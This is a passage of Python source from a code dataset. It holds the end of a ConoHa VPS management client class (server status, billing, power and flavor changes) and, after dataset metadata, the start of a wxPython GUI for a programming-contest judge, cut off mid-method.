            ipv6 (bool): Flag that show IPv6 address or not
        Returns:
            texttable.Texttable: Server name, Tag and UUID
            texttable.Texttable: IPv4/IPv6 address, server status and plan
        """
        if type(server_id) is not str:
            raise TypeError
        # the except clauses below only propagate; they document which
        # exceptions callers should expect from the lookup
        try:
            res = self.get_vm_detail(self.check_id_or_tag(server_id))
        except exceptions.ServerNotFoundError:
            raise
        except exceptions.NothingServerIDError:
            raise
        except Exception:
            raise
        # collect the first matching address of each requested IP version
        address = {'ipv4': None, 'ipv6': None}
        for interface in res['server']['addresses']:
            for nwinfo in res['server']['addresses'][interface]:
                if nwinfo['version'] == 4 and ipv4:
                    address['ipv4'] = nwinfo['addr']
                elif nwinfo['version'] == 6 and ipv6:
                    address['ipv6'] = nwinfo['addr']
        first_table = self.return_table(3)
        second_table = self.return_table(4)
        first_table.header(['Name', 'Tag', 'UUID'])
        first_table.add_row(
            [
                res['server']['name'],
                res['server']['metadata']['instance_name_tag'],
                res['server']['id']
            ]
        )
        second_table.header(['IPv4', 'IPv6', 'Status', 'Plan'])
        second_table.add_row(
            [
                address['ipv4'],
                address['ipv6'],
                res['server']['status'],
                self.__api.get_flavor_name(res['server']['flavor']['id'])
            ]
        )
        return first_table, second_table

    def show_billing(self, limit=1):
        """Show billing invoices
        Args:
            limit (int): number of billing information
        Returns:
            texttable.Texttable:
                It contains invoice ID, payment method, bill, and due date.
        """
        if type(limit) is not int:
            raise TypeError
        if limit < 0:
            raise ValueError
        body, _ = self.__api.get_billing_invoices(limit=limit)
        table = self.return_table(4)
        table.header(['Invoice ID', 'Type', 'Yen (include tax)', 'Due'])
        for i in range(len(body['billing_invoices'])):
            table.add_row(
                [
                    body['billing_invoices'][i]['invoice_id'],
                    body['billing_invoices'][i]['payment_method_type'],
                    body['billing_invoices'][i]['bill_plus_tax'],
                    body['billing_invoices'][i]['due_date']
                ]
            )
        return table

    def power_on_vm(self, server_id):
        """Power on to specified virtual machine
        Args:
            server_id (str): virtual machine UUID
        Returns:
            texttable.Texttable:
                It contains Tag, before status and current status
        """
        if type(server_id) is not str:
            raise TypeError
        uuid = self.check_id_or_tag(server_id)
        before_power_on = self.get_vm_detail(uuid)
        # only act when the VM is actually off; otherwise just report status
        if before_power_on['server']['status'] == 'SHUTOFF':
            self.__api.power_on_vm(uuid)
        after_power_on = self.get_vm_detail(uuid)
        return self.return_vm_status_table(before_power_on, after_power_on)

    def shutoff_vm(self, server_id):
        """Shut off to specified virtual machine
        Args:
            server_id (str): virtual machine UUID
        Returns:
            texttable.Texttable:
                It contains Tag, before status and current status
        """
        if type(server_id) is not str:
            raise TypeError
        uuid = self.check_id_or_tag(server_id)
        before_shutoff = self.get_vm_detail(uuid)
        if before_shutoff['server']['status'] == 'ACTIVE':
            self.__api.stop_cleanly_vm(uuid)
        after_shutoff = self.get_vm_detail(uuid)
        return self.return_vm_status_table(before_shutoff, after_shutoff)

    def reboot_vm(self, server_id):
        """Reboot specified virtual machine
        Args:
            server_id (str): virtual machine UUID
        Returns:
            texttable.Texttable:
                It contains Tag, before status and current status
        """
        if type(server_id) is not str:
            raise TypeError
        uuid = self.check_id_or_tag(server_id)
        before_reboot = self.get_vm_detail(uuid)
        if before_reboot['server']['status'] == 'ACTIVE':
            self.__api.reboot_vm(uuid)
        after_reboot = self.get_vm_detail(uuid)
        return self.return_vm_status_table(before_reboot, after_reboot)

    def get_flavor_id_from_name(self, flavor_name):
        """Return flavor ID by given flavor name
        Args:
            flavor_name (str): flavor name
        Return:
            str: flavor ID
        """
        # closed set of plan names accepted by the ConoHa API
        flavors = [
            'g-512mb',
            'g-1gb',
            'g-2gb',
            'g-4gb',
            'g-8gb',
            'g-16gb',
            'g-32gb',
            'g-64gb'
        ]
        if type(flavor_name) is not str:
            raise TypeError
        if flavor_name not in flavors:
            raise ValueError
        return self.__api.get_flavor_id(flavor_name)

    def get_flavor_name_from_id(self, flavor_id):
        """Return flavor name by given flavor ID
        Args:
            flavor_id (str): flavor ID
        Returns:
            str: flavor name
        """
        if type(flavor_id) is not str:
            raise TypeError
        return self.__api.get_flavor_name(flavor_id)

    def change_flavor(self, server_id, flavor_name):
        """Change given server's flavor to given flavor_name
        The VM must be SHUTOFF; otherwise the current status is printed and
        None is returned.
        Args:
            server_id (str): virtual machine UUID
            flavor_name (str): flavor name
        Returns:
            texttable.Texttable:
                It contains Tag, flavor before operation
                and flavor after operation
        """
        uuid = self.check_id_or_tag(server_id)
        pre = self.get_vm_detail(uuid)
        if pre['server']['status'] != 'SHUTOFF':
            print('Current VM status is ' + pre['server']['status'])
            return None
        flavor_id = self.__api.get_flavor_id(flavor_name)
        self.__api.change_flavor(uuid, flavor_id)
        # poll until the resize is ready for confirmation, then confirm it
        # NOTE(review): both loops poll forever — no timeout if the API hangs.
        while True:
            vm = self.get_vm_detail(uuid)
            if vm['server']['status'] == 'VERIFY_RESIZE':
                self.__api.confirm_flavor(uuid)
                break
            else:
                time.sleep(10)
        # wait for the VM to settle back into SHUTOFF after confirmation
        while True:
            vm = self.get_vm_detail(uuid)
            if vm['server']['status'] == 'SHUTOFF':
                break
            else:
                time.sleep(5)
        table = self.return_table(4)
        table.header(['Tag', 'Previous', '->', 'Now'])
        table.add_row(
            [
                vm['server']['metadata']['instance_name_tag'],
                self.get_flavor_name_from_id(pre['server']['flavor']['id']),
                '->',
                self.get_flavor_name_from_id(vm['server']['flavor']['id']),
            ]
        )
        return table
|
[
"[email protected]"
] | |
83fda4a0cc40d780c4a71958ee5387a34a1c76ea
|
298b3c9e4920f1e897dae501c5e958d5a70c81ff
|
/grpcontest.py
|
60d60f51c294c9b12bdb5b27dd944895f03243c3
|
[] |
no_license
|
rapidhere/rpcontest
|
f0a57df25af75358d07f1670b03ba0865cd452c0
|
717b26b01299aea50d04e0b9d2c28c956aa44d5b
|
refs/heads/master
| 2021-01-01T06:11:12.462919 | 2013-04-12T08:28:20 | 2013-04-12T08:28:20 | 9,389,931 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 42,292 |
py
|
#!/usr/bin/python
import wx,os,sys,copy,thread,shutil
import rpc
import wx.aui,wx.gizmos
# Application identity shown in the GUI title / about information.
app_name = "gui-rpcontest"
version = "1.0.0.1"
def CreateLabelItem(parent, label, item):
    """Wrap *item* in a labelled static box and return the resulting sizer."""
    box = wx.StaticBox(parent, -1, label=label)
    boxed_sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
    boxed_sizer.Add(item, 1, wx.EXPAND)
    return boxed_sizer
def PError(parent, txt):
    """Show a modal error box with message *txt* over *parent*.

    Fix: the dialog was never destroyed after ShowModal(); wx modal dialogs
    must be explicitly Destroy()ed or their native resources leak.
    """
    error_dialog = wx.MessageDialog(
        parent=parent,
        caption="Error",
        message=txt,
        style=wx.ICON_ERROR | wx.OK
    )
    error_dialog.ShowModal()
    error_dialog.Destroy()
class rpcontest_EVT_ADD_RUNTIME_INFO(wx.PyCommandEvent):
    # Custom wx command event carrying a text payload; used to append a line
    # of runtime information from worker threads to the GUI.
    def __init__(self,evtType,id):
        wx.PyCommandEvent.__init__(self,evtType,id)
    def GetText(self):
        # Return the payload previously stored with SetText().
        return self.txt
    def SetText(self,txt):
        # Store the text payload (plain attribute; no copy is made).
        self.txt = txt
class rpcontest_EVT_UPDATE_DISPLAY(wx.PyCommandEvent):
    # Custom wx command event asking the GUI to refresh part of its display.
    def __init__(self,evtType,id):
        wx.PyCommandEvent.__init__(self,evtType,id)
    def Set(self,UpdateType,con):
        # Store the update kind and its context object as a pair.
        self.UpdateType = UpdateType
        self.con = con
    def Get(self):
        # Return (UpdateType, con) exactly as stored by Set().
        return self.UpdateType,self.con
# wx event plumbing: fresh event-type ids plus the binder objects panels use
# with Bind() to receive the custom events emitted below.
rpEVT_ADD_RUNTIME_INFO = wx.NewEventType()
EVT_ADD_RUNTIME_INFO = wx.PyEventBinder(rpEVT_ADD_RUNTIME_INFO,1)
rpEVT_UPDATE_DISPLAY = wx.NewEventType()
EVT_UPDATE_DISPLAY = wx.PyEventBinder(rpEVT_UPDATE_DISPLAY,1)
def EmitAppendRuntimeInfo(self, text):
    """Build an ADD_RUNTIME_INFO event carrying *text* and dispatch it on self."""
    event = rpcontest_EVT_ADD_RUNTIME_INFO(rpEVT_ADD_RUNTIME_INFO, self.GetId())
    event.SetText(text)
    self.GetEventHandler().ProcessEvent(event)
def EmitUpdateDisplay(self, t, con):
    """Build an UPDATE_DISPLAY event with payload (t, con) and dispatch it on self."""
    event = rpcontest_EVT_UPDATE_DISPLAY(rpEVT_UPDATE_DISPLAY, self.GetId())
    event.Set(t, con)
    self.GetEventHandler().ProcessEvent(event)
class rpcontest_CheckList(wx.Panel):
    # A check-list box plus "Select All" / "Deselect All" buttons.
    # self.SelectedIndex mirrors the checked item indices; custom handlers may
    # be injected via the On* constructor arguments (they replace, not wrap,
    # the defaults, so injected handlers must maintain SelectedIndex too).
    def __init__(self,parent,size=(150,100),OnCheckListBox = None,OnChooseAll = None,OnDechooseAll = None):
        wx.Panel.__init__(self,parent)
        self.sizer = wx.BoxSizer(wx.VERTICAL)
        self.SelectedIndex = []
        self.ListBox = wx.CheckListBox(self,-1,size=size)
        self.sizer.Add(self.ListBox,1,wx.EXPAND)
        hsizer = wx.BoxSizer()
        self.ChooseAllButton = wx.Button(self,-1,"Select All")
        hsizer.Add(self.ChooseAllButton,0,wx.ALIGN_RIGHT)
        self.DechooseAllButton = wx.Button(self,-1,"Deselect All")
        hsizer.Add(self.DechooseAllButton,0,wx.ALIGN_RIGHT)
        self.sizer.Add(hsizer,0,wx.EXPAND)
        self.SetSizer(self.sizer)
        # fall back to the built-in handlers when none were injected
        if not OnChooseAll: OnChooseAll = self.OnChooseAll
        if not OnDechooseAll: OnDechooseAll = self.OnDechooseAll
        if not OnCheckListBox: OnCheckListBox = self.OnCheckListBox
        self.Bind(wx.EVT_BUTTON,OnChooseAll,self.ChooseAllButton)
        self.Bind(wx.EVT_BUTTON,OnDechooseAll,self.DechooseAllButton)
        self.Bind(wx.EVT_CHECKLISTBOX,OnCheckListBox,self.ListBox)
    def ClearAll(self):
        # Remove every item and forget the selection.
        self.ListBox.Clear()
        self.SelectedIndex = []
    def Append(self,label):
        self.ListBox.Append(label)
    def GetCheckedItems(self):
        # Return a defensive copy so callers cannot mutate internal state.
        return copy.deepcopy(self.SelectedIndex)
    def OnChooseAll(self,event):
        # Check every item and record all indices as selected.
        self.SelectedIndex = range(0,self.ListBox.GetCount())
        for i in self.SelectedIndex:
            self.ListBox.Check(i)
        event.Skip()
    def OnDechooseAll(self,event):
        # Uncheck every item and clear the selection record.
        for i in range(0,self.ListBox.GetCount()):
            self.ListBox.Check(i,False)
        self.SelectedIndex = []
        event.Skip()
    def OnCheckListBox(self,event):
        # Keep SelectedIndex in sync with the toggled item.
        index = event.GetSelection()
        if self.ListBox.IsChecked(index):
            self.SelectedIndex.append(index)
        else:
            self.SelectedIndex.remove(index)
        event.Skip()
class rpcontest_Gauge(wx.Panel):
    # Progress bar (0..1000 internal range) with a textual percentage label.
    def __init__(self,parent):
        self.Width = 20  # fixed character width for the percentage label
        wx.Panel.__init__(self,parent,-1)
        self.sizer = wx.BoxSizer()
        self.Gauge = wx.Gauge(self,-1,1000)
        self.sizer.Add(self.Gauge,1,wx.EXPAND)
        self.Processer = wx.StaticText(self,-1,style=wx.ALIGN_LEFT,label= " [0.000 %]".center(self.Width))
        self.sizer.Add(self.Processer,0,wx.EXPAND)
        self.SetSizer(self.sizer)
    def SetTotal(self,tot):
        # Set the denominator and restart progress from zero.
        # NOTE(review): tot == 0 would cause ZeroDivisionError in SetCurrent.
        self.Total = tot
        self.Current = 0
    def SetCurrent(self,cur):
        # Update both the percentage label and the gauge position.
        self.Current = cur
        self.Processer.SetLabel((" [%.3f %%]" % (float(self.Current) / float(self.Total) * 100.0)).center(self.Width))
        self.Gauge.SetValue(float(self.Current) / float(self.Total) * 1000)
    def Reset(self):
        # The first SetLabel is immediately overwritten by SetCurrent(0);
        # its slightly different spelling (" [0.000%]") is therefore harmless.
        self.Processer.SetLabel(" [0.000%]".center(self.Width))
        self.SetTotal(1)
        self.SetCurrent(0)
class EditSpotInfoDialog(wx.Dialog):
    # Modal dialog for editing one test point, or batch-validating the same
    # settings over several indices when IndexList is given.
    # ShowDialog() returns the edited rpc.TestPoint, or None on cancel.
    def __init__(self,parent,tk,spot = None,flag_UnableEditIndex = False,IndexList = None):
        wx.Dialog.__init__(self,parent,
            id=-1,
            size=(400,500),
            title="Edit Spot details",
            style=wx.CAPTION
        )
        self.IndexList = IndexList                    # indices to validate against (batch mode)
        self.flag_UnableEditIndex = flag_UnableEditIndex  # grey out the index field
        self.tk = tk                                  # task the spot belongs to
        if spot:
            self.spot = spot
        else:
            self.spot = rpc.TestPoint()               # start from a fresh test point
        self.Centre()
        self.sizer = wx.BoxSizer(wx.VERTICAL)
        self.sizer.AddStretchSpacer(1)
        self.sizer.Add(self.CreateWorkSpace(),0,wx.EXPAND)
        self.sizer.AddStretchSpacer(1)
        self.sizer.Add(self.CreateButtonBar(),0,wx.EXPAND)
        self.SetSizer(self.sizer)
        self.Bind(wx.EVT_BUTTON,self.OnOK,self.OKButton)
        self.Bind(wx.EVT_BUTTON,self.OnCancel,self.CancelButton)
        self.Bind(wx.EVT_BUTTON,self.OnChoose,self.ChooseButton)
        self.Bind(wx.EVT_CHOICE,self.OnChoice,self.CmpModeCtrl)
    def CreateWorkSpace(self):
        # Build the fixed-position form with one labelled text field per
        # spot attribute; returns the surrounding static-box sizer.
        def CreateLabel(label,pos):
            return wx.StaticText(self.ConfigPanel,-1,label,pos=pos,size=(100,25))
        def CreateTextCtrl(pos,txt):
            return wx.TextCtrl(self.ConfigPanel,-1,pos=pos,size=(150,25),value=txt)
        self.ConfigPanel = wx.Panel(self,-1,size=(300,400))
        label = CreateLabel("Index",(50,20))  # (return value unused)
        self.IndexCtrl = CreateTextCtrl((200,20),self.spot.FormatIndex())
        if self.flag_UnableEditIndex:
            # index is fixed (e.g. batch edit): make the field read-only
            self.IndexCtrl.SetEditable(False)
            self.IndexCtrl.SetBackgroundColour("Grey")
        CreateLabel("Timelim(s)",(50,50))
        self.TimeCtrl = CreateTextCtrl((200,50),self.spot.FormatTimeLimit())
        CreateLabel("Memlim(kb)",(50,80))
        self.MemCtrl = CreateTextCtrl((200,80),self.spot.FormatMemLimit())
        CreateLabel("Input",(50,110))
        self.InputCtrl = CreateTextCtrl((200,110),self.spot.GetInput())
        CreateLabel("Output",(50,140))
        self.OutputCtrl= CreateTextCtrl((200,140),self.spot.GetOutput())
        CreateLabel("Score",(50,170))
        self.ScoreCtrl = CreateTextCtrl((200,170),self.spot.FormatScore())
        CreateLabel("CmpMode",(50,200))
        CreateLabel("Checker Path:",(50,230))
        self.CmpModeCtrl = wx.Choice(self.ConfigPanel,-1,pos=(150,200),size=(200,25),
            choices=["Ignore Extra Spaces","Compare Every Character","User Define"]
        )
        self.ChooseButton = wx.Button(self.ConfigPanel,-1,pos=(270,230),size=(80,25),label="Choose")
        self.UserDefinePath = wx.TextCtrl(self.ConfigPanel,-1,
            size=(300,100),pos=(50,260),
            style=wx.TE_READONLY | wx.TE_MULTILINE
        )
        self.SetCmpModeState()
        bsizer = wx.StaticBoxSizer(
            wx.StaticBox(self,-1,label="Details"),
            wx.VERTICAL
        )
        bsizer.Add(self.ConfigPanel,0,wx.EXPAND)
        return bsizer
    def SetCmpModeState(self):
        # Sync the compare-mode choice, checker path field and Choose button
        # with the spot's current compare mode.
        index = 0
        if self.spot.GetCmpMode()[0] == rpc.CMPMODE_IGNORE:
            index = 0
        elif self.spot.GetCmpMode()[0] == rpc.CMPMODE_TOTAL:
            index = 1
        elif self.spot.GetCmpMode()[0] == rpc.CMPMODE_USERDEF:
            index = 2
        self.CmpModeCtrl.SetSelection(index)
        if index == 0 or index == 1:
            # built-in comparators: no user checker path needed
            self.ChooseButton.Disable()
            self.UserDefinePath.Clear()
            self.UserDefinePath.SetBackgroundColour("Grey")
        else:
            # user-defined checker: show its path and allow re-choosing
            self.ChooseButton.Enable()
            self.UserDefinePath.SetBackgroundColour("pink")
            self.UserDefinePath.Clear()
            self.UserDefinePath.AppendText(self.spot.GetCmpMode()[1])
    def CreateButtonBar(self):
        # OK / Cancel row, right-aligned.
        sizer = wx.BoxSizer()
        sizer.AddStretchSpacer(1)
        self.OKButton = wx.Button(self,-1,"OK")
        sizer.Add(self.OKButton,0)
        self.CancelButton = wx.Button(self,-1,"Cancel")
        sizer.Add(self.CancelButton,0)
        return sizer
    def OnCancel(self,event):
        # Signal cancellation to ShowDialog() by clearing the result.
        self.spot = None
        self.Destroy()
    def OnOK(self,event):
        # Validate the form values against a deep copy; only commit to
        # self.spot when every index passes Check().
        # NOTE(review): data_path below is computed but never used.
        data_path = self.GetParent().con.GetPath() + r'/' + rpc.PATH_D_DATA + r'/' + self.tk.GetTaskName()
        spot = copy.deepcopy(self.spot)
        try:
            spot.SetIndex(self.IndexCtrl.GetValue())
            spot.SetTimeLimit(self.TimeCtrl.GetValue())
            spot.SetMemLimit(self.MemCtrl.GetValue())
            spot.SetInput(self.InputCtrl.GetValue())
            spot.SetOutput(self.OutputCtrl.GetValue())
            spot.SetScore(self.ScoreCtrl.GetValue())
            # batch mode: re-check the same settings under every index
            IndexList = self.IndexList if self.IndexList else [spot.GetIndex()]
            for Index in IndexList:
                spot.SetIndex(Index)
                spot.Check(self.tk.GetDataPath(),self.tk.GetTaskName())
        except rpc.RpException,x:
            # validation failed: report and keep the dialog open
            PError(self,x.FormatErrorText())
            return
        finally:
            event.Skip()
        self.spot = spot
        self.Destroy()
    def OnChoose(self,event):
        # Pick a user-defined checker executable for CMPMODE_USERDEF.
        ch = wx.FileDialog(self,
            wildcard="*.*",
            defaultDir = self.GetParent().con.GetPath(),
            message = "Choose a Checker",
            style= wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
        )
        if ch.ShowModal() == wx.ID_OK:
            self.spot.SetCmpMode(rpc.CMPMODE_USERDEF,ch.GetPath())
            self.SetCmpModeState()
        event.Skip()
    def OnChoice(self,event):
        # Map the choice index back onto the spot's compare mode.
        index = self.CmpModeCtrl.GetCurrentSelection()
        if index == 0: self.spot.SetCmpMode(rpc.CMPMODE_IGNORE)
        elif index == 1: self.spot.SetCmpMode(rpc.CMPMODE_TOTAL)
        elif index == 2: self.spot.SetCmpMode(rpc.CMPMODE_USERDEF,"")
        self.SetCmpModeState()
    def ShowDialog(self):
        # Run modally; return the edited spot or None when cancelled.
        self.ShowModal()
        return self.spot
class rpcontest_ConfigurePanel(wx.Panel):
def __init__(self,parent,con):
wx.Panel.__init__(self,parent)
self.sizer = wx.BoxSizer()
self.con = con
self.sizer.Add(self.CreateTaskBar(),0,flag=wx.EXPAND)
self.sizer.Add(self.CreateCompetitorBar(),0,flag=wx.EXPAND)
self.sizer.Add(self.CreateTaskInfoBar(),1,flag=wx.EXPAND)
self.SetSizer(self.sizer)
self.Bind(wx.EVT_LISTBOX,self.OnSelectTask,self.TaskListBox)
self.Bind(wx.EVT_CHECKLISTBOX,self.OnCheckListBox,self.TaskListBox)
self.Bind(wx.EVT_BUTTON,self.OnAddSpot,self.AddSpotButton)
self.Bind(wx.EVT_BUTTON,self.OnEditSpot,self.EditSpotButton)
self.Bind(wx.EVT_BUTTON,self.OnRemoveSpot,self.RemoveSpotButton)
self.Bind(wx.EVT_BUTTON,self.OnAddOtherSpot,self.AddOtherSpotButton)
self.Bind(wx.EVT_LIST_ITEM_SELECTED,self.OnSelectPoint,self.PointList)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED,self.OnDeselectPoint,self.PointList)
self.Bind(wx.EVT_TEXT_ENTER,self.OnChangeTitleBar,self.TitleBar)
self.Bind(wx.EVT_TEXT_ENTER,self.OnChangeSrcFile,self.SrcBar)
self.Bind(wx.EVT_TEXT_ENTER,self.OnChangeSrcInput,self.SrcInputBar)
self.Bind(wx.EVT_TEXT_ENTER,self.OnChangeSrcOutput,self.SrcOutputBar)
self.Bind(wx.EVT_CHECKLISTBOX,self.OnCheckCompetitor,self.CompetitorListBox)
def CreateTaskBar(self):
tsizer = wx.BoxSizer(wx.VERTICAL)
self.TitleBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_PROCESS_ENTER)
tsizer.Add(CreateLabelItem(self,"Title",self.TitleBar),
0,flag=wx.ALIGN_LEFT | wx.TOP)
self.TaskListBox = wx.CheckListBox(
parent=self,
id=-1,
name="Tasks",
style = wx.LB_SINGLE | wx.LB_ALWAYS_SB
)
tsizer.Add(CreateLabelItem(self,"Tasks",self.TaskListBox),
1,wx.EXPAND)
return tsizer
def CreateCompetitorBar(self):
self.CompetitorListBox = wx.CheckListBox(self,-1,size=(150,20))
return CreateLabelItem(self,"Competitors",self.CompetitorListBox)
def CreateTaskInfoBar(self):
sizer = wx.BoxSizer(wx.VERTICAL)
hsizer = wx.BoxSizer()
self.TaskTitleBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_READONLY)
hsizer.Add(CreateLabelItem(self,"TaskTitle",self.TaskTitleBar),
0,wx.EXPAND)
self.SrcBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_PROCESS_ENTER)
hsizer.Add(CreateLabelItem(self,"SrcFile",self.SrcBar),
0,wx.EXPAND)
self.SrcInputBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_PROCESS_ENTER)
hsizer.Add(CreateLabelItem(self,"SrcInput",self.SrcInputBar),
0,wx.EXPAND)
self.SrcOutputBar = wx.TextCtrl(self,-1,size=(150,20),style=wx.TE_PROCESS_ENTER)
hsizer.Add(CreateLabelItem(self,"SrcOutput",self.SrcOutputBar),
0,wx.EXPAND)
sizer.Add(hsizer,0,wx.ALIGN_LEFT)
sizer.Add(self.CreateSpotDetailsBar(),1,wx.EXPAND)
return sizer
def CreateSpotDetailsBar(self):
self.Columns = (
("#",20),
("Index",50),
("Timelim(s)",-1),
("MemLim(kB)",-1),
("Input",-1),
("Output",-1),
("Score",-1),
("cmpmode",-1),
)
sizer = wx.BoxSizer(wx.VERTICAL)
self.PointList = wx.ListCtrl(self,-1,style=wx.LC_REPORT)
self.SelectedIndex = []
index = 0
for item,width in self.Columns:
self.PointList.InsertColumn(index,item,width=width)
index += 1
sizer.Add(CreateLabelItem(self,"Spots Details",self.PointList)
,1,wx.EXPAND)
hsizer = wx.BoxSizer()
self.AddSpotButton = wx.Button(self,-1,"Add Spot")
hsizer.Add(self.AddSpotButton,0,wx.EXPAND)
self.EditSpotButton = wx.Button(self,-1,"Edit Spot(s)")
hsizer.Add(self.EditSpotButton,0,wx.EXPAND)
self.AddOtherSpotButton = wx.Button(self,-1,"Add Other Spot(s)")
hsizer.Add(self.AddOtherSpotButton,0,wx.EXPAND)
self.AddOtherSpotButton.Disable()
self.RemoveSpotButton = wx.Button(self,-1,"Remove Spot(s)")
hsizer.Add(self.RemoveSpotButton,0,wx.EXPAND)
sizer.Add(hsizer,0,wx.EXPAND)
return sizer
def ClearSpotDetails(self):
self.PointList.DeleteAllItems()
self.SelectedIndex = []
self.TaskTitleBar.Clear()
self.SrcBar.Clear()
self.SrcInputBar.Clear()
self.SrcOutputBar.Clear()
self.AddOtherSpotButton.Disable()
def DisplaySpotDetails(self,tk_id):
self.ClearSpotDetails()
tk = self.con.GetTaskList()[tk_id]
self.TaskTitleBar.WriteText(tk.GetTaskName())
self.SrcBar.WriteText(tk.GetSrc())
self.SrcInputBar.WriteText(tk.GetSrcIn())
self.SrcOutputBar.WriteText(tk.GetSrcOut())
i = 0
for spot in tk.GetPointList():
index = self.PointList.InsertStringItem(sys.maxint,str(i))
self.PointList.SetStringItem(index,1,spot.FormatIndex())
self.PointList.SetStringItem(index,2,spot.FormatTimeLimit())
self.PointList.SetStringItem(index,3,spot.FormatMemLimit())
self.PointList.SetStringItem(index,4,spot.FormatInput(tk.GetTaskName()))
self.PointList.SetStringItem(index,5,spot.FormatOutput(tk.GetTaskName()))
self.PointList.SetStringItem(index,6,spot.FormatScore())
self.PointList.SetStringItem(index,7,spot.FormatCmpMode()[0])
i += 1
if self.PointList.GetItemCount() == 0:
self.AddOtherSpotButton.Disable()
else:
self.AddOtherSpotButton.Enable()
def UpdateDisplay(self,con = None):
self.PointList.DeleteAllItems()
self.TaskTitleBar.Clear()
self.SrcBar.Clear()
self.SrcInputBar.Clear()
self.SrcOutputBar.Clear()
self.TitleBar.Clear()
self.TaskListBox.Clear()
self.CompetitorListBox.Clear()
self.con = con
if not self.con: return
self.TitleBar.WriteText(self.con.GetTitle())
for ft in os.listdir(self.con.GetPath()):
if ft.split(".")[-1] == rpc.EXT_TYPE_RTC:
self.TaskListBox.Append(ft[:-len(rpc.EXT_TYPE_RTC) - 1])
tasklist = self.TaskListBox.GetStrings()
for tk in self.con.GetTaskList():
if tk.GetTaskName() in tasklist:
self.TaskListBox.Check(tasklist.index(tk.GetTaskName()))
for ft in os.listdir(self.con.GetPath() + r'/' + rpc.PATH_D_SRC):
if os.path.isdir(self.con.GetPath() + r'/' + rpc.PATH_D_SRC + r'/' + ft):
self.CompetitorListBox.Append(ft)
cplist = self.CompetitorListBox.GetStrings()
for cp in self.con.GetCompetitorList():
if cp.GetName() in cplist:
self.CompetitorListBox.Check(cplist.index(cp.GetName()))
def GetSelectedTask(self):
sel = self.TaskListBox.GetStringSelection()
if not sel:
return None,-1
index = self.con.IndexTask(sel)
if index == -1:
return sel,-1
return sel,index
def OnSelectTask(self,event):
sel,index = self.GetSelectedTask()
EmitAppendRuntimeInfo(self,"Current Task : %s\n" % sel)
if not sel or index ==-1: return
self.DisplaySpotDetails(index)
def OnCheckListBox(self,event):
index = event.GetSelection()
tk_name = self.TaskListBox.GetString(index)
if self.TaskListBox.IsChecked(index):
try:
self.con.AddTask(str(tk_name))
self.TaskListBox.SetSelection(index)
self.DisplaySpotDetails(self.con.IndexTask(self.TaskListBox.GetSelection()))
except rpc.RpException,x:
PError(self,x.FormatErrorText())
return
else:
self.con.RemoveTask(tk_name)
self.ClearSpotDetails()
EmitUpdateDisplay(self,"Judge",self.con)
def OnAddSpot(self,event):
EmitAppendRuntimeInfo(self,"Add A Spot\n")
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
dia = EditSpotInfoDialog(self,self.con.GetTaskList()[index])
spot = dia.ShowDialog()
if spot:
self.con.GetTaskList()[index].AddPoint(spot)
self.DisplaySpotDetails(index)
finally:
event.Skip()
def OnSelectPoint(self,event):
self.SelectedIndex.append(event.m_itemIndex)
event.Skip()
def OnDeselectPoint(self,event):
self.SelectedIndex.remove(event.m_itemIndex)
event.Skip()
def OnEditSpot(self,event):
try:
if len(self.SelectedIndex) == 0:
EmitAppendRuntimeInfo(self,"<WARN>No spot to edit!\n")
return
EmitAppendRuntimeInfo(self,"Edit Spot(s) #%s\n" % sorted(self.SelectedIndex))
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
spot = rpc.TestPoint()
dia = EditSpotInfoDialog(self,self.con.GetTaskList()[index],
spot = spot,flag_UnableEditIndex = True,
IndexList=self.SelectedIndex
)
spot = dia.ShowDialog()
if spot:
for pos in self.SelectedIndex:
idx = self.con.GetTaskList()[index].GetPointList()[pos].GetIndex()
spot.SetIndex(idx)
self.con.GetTaskList()[index].RemovePoint(idx)
self.con.GetTaskList()[index].AddPoint(spot)
self.DisplaySpotDetails(index)
finally:
event.Skip()
def OnRemoveSpot(self,event):
try:
if len(self.SelectedIndex) == 0:
EmitAppendRuntimeInfo(self,"<WARN>No spot to remove!\n")
return
EmitAppendRuntimeInfo(self,"Remove spot(s) #%s\n" % self.SelectedIndex)
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
if wx.MessageDialog(self,
message = "Remove these spots?",
caption = "Caution",
style = wx.YES_NO | wx.ICON_EXCLAMATION | wx.NO_DEFAULT
).ShowModal() == wx.ID_NO:
return
for idx in self.SelectedIndex:
self.con.GetTaskList()[index].RemovePoint(idx)
self.DisplaySpotDetails(index)
finally:
event.Skip()
def OnAddOtherSpot(self,event):
EmitAppendRuntimeInfo(self,"Finding ...\n")
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
Task = self.con.GetTaskList()[index]
spot = copy.deepcopy(Task.GetPointList()[0])
for idx in range(0,1000):
spot.SetIndex(idx)
try:
spot.Check(Task.GetDataPath(),Task.GetTaskName())
except rpc.RpException:
continue
else:
EmitAppendRuntimeInfo(self," Found new spot @Index:%d\n" % idx)
Task.AddPoint(spot)
self.DisplaySpotDetails(index)
finally:
event.Skip()
def OnChangeTitleBar(self,event):
try:
if not self.con: return
EmitAppendRuntimeInfo(self,"New Contest Title : %s\n" % self.TitleBar.GetValue())
self.con.SetTitle(self.TitleBar.GetValue())
finally:
event.Skip()
def OnChangeSrcFile(self,event):
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
EmitAppendRuntimeInfo(self,"New Source File : %s\n" % self.SrcBar.GetValue())
self.con.GetTaskList()[index].SetSrc(self.SrcBar.GetValue())
finally:
event.Skip()
def OnChangeSrcInput(self,event):
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
EmitAppendRuntimeInfo(self,"New src input : %s\n" % self.SrcInputBar.GetValue())
self.con.GetTaskList()[index].SetSrcIn(self.SrcInputBar.GetValue())
finally:
event.Skip()
def OnChangeSrcOutput(self,event):
try:
sel,index = self.GetSelectedTask()
if not sel or index == -1: return
EmitAppendRuntimeInfo(self,"New src output : %s\n" % self.SrcOutputBar.GetValue())
self.con.GetTaskList()[index].SetSrcOut(self.SrcOutputBar.GetValue())
finally:
event.Skip()
def OnCheckCompetitor(self,event):
index = event.GetSelection()
